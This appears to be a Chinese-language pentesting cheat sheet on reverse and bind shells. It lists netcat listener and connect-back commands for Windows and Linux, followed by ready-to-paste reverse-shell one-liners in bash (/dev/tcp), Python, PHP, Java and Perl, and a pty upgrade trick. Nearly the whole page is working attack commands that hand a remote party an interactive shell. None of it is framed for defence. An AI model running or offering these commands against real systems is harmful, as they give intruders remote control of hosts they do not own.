跳到主要内容

反弹shell

nc反向

Linux控制端:nc -lvp 5555

目标主机:

#windwos
nc 192.168.172.129 5555 -e cmd.exe
#Linux
bash -i >& /dev/tcp/192.168.172.136/6666 0>&1 /bin/bash
nc 192.168.172.136 6666 -e /bin/bash

nc正向

目标主机:

#windows
nc -lvp 6666 -e cmd.exe
#linux
nc -lvp 6666 -e /bin/bash

控制端:nc 192.168.172.169 6666

常用反弹shell

https://www.revshells.com

bash反弹shell

bash -i >& /dev/tcp/127.0.0.1/4444 0>&1

python反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

php反弹shell

php -r '$sock=fsockopen("127.0.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

java反弹shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/127.0.0.1/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()

Perl反弹shell

perl -e 'use Socket;$i="127.0.0.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'